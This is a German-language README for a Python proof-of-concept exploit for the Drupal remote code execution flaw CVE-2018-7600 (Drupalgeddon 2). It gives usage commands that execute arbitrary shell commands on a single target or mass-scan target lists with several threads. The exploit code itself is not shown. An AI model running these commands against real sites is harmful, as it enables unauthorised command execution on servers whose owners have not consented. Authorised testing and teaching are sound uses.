
Dieses Repository enthält einen vollständig originellen und selbst entwickelten Proof-of-Concept (PoC) für CVE-2018-7600, auch bekannt als Drupalgeddon 2 — eine kritische Remote-Codeausführungs-Schwachstelle, die die Core-Versionen Drupal 7 und 8 betrifft.
Dieses Repository enthält einen Python-basierten Proof-of-Concept-Exploit für die kritische Remote-Codeausführungsschwachstelle in Drupal, bekannt als Drupalgeddon2 (CVE-2018-7600). Dieses Skript ist für Bildungszwecke und für Sicherheitsexperten zur Verwendung in autorisierten Penetrationstest-Szenarien gedacht.
Dieses Tool ist ausschließlich für legale und ethische Zwecke bestimmt. Die Verwendung dieses Skripts auf einem System ohne ausdrückliche Genehmigung des Eigentümers ist illegal. Der Autor und die Mitwirkenden sind nicht für Missbrauch oder Schäden verantwortlich, die durch dieses Skript verursacht werden. Verwendung auf eigene Gefahr.
requests-Bibliothekcolorama-Bibliothekgit clone <repository-url>
cd <repository-directory>
pip install -r requirements.txt
pip install requests colorama
Das Skript bietet mehrere Befehlszeilenargumente, um seine Ausführung anzupassen.
Ein einzelnes Ziel mit dem Standardbefehl (whoami) ausnutzen:
python3 drupalgeddon2.py -t http://example.com
Ein einzelnes Ziel mit einem benutzerdefinierten Befehl (z. B. ls -la) ausnutzen:
python3 drupalgeddon2.py -t http://vulnerable-drupal.site -c "ls -la"
Eine Liste von Zielen aus einer Datei scannen:
Erstellen Sie eine Datei namens targets.txt mit einer URL pro Zeile:
http://site1.com
https://site2.org
http://site3.net
Führen Sie dann das Skript aus:
python3 drupalgeddon2.py -l targets.txt
Eine Liste mit einem benutzerdefinierten Befehl und erhöhter Thread-Anzahl scannen:
python3 drupalgeddon2.py -l targets.txt -c "uname -a" -T 10
Die Ausgabe in einer Protokolldatei speichern:
python3 drupalgeddon2.py -l targets.txt -o scan_results.log
| Argument | Kurz | Beschreibung | Standard |
|---|
--target | -t | Eine einzelne Ziel-URL. | - |
--list | -l | Pfad zu einer Datei, die eine Liste von Ziel-URLs enthält. | - |
--command | -c | Der Befehl, der auf dem Ziel ausgeführt werden soll. | whoami |
--threads | -T | Anzahl der gleichzeitig zu verwendenden Threads. | 5 |
--output | -o | Datei, in die die Ausgabe protokolliert werden soll. | - |
--timeout | Anfrage-Timeout in Sekunden. | 15 |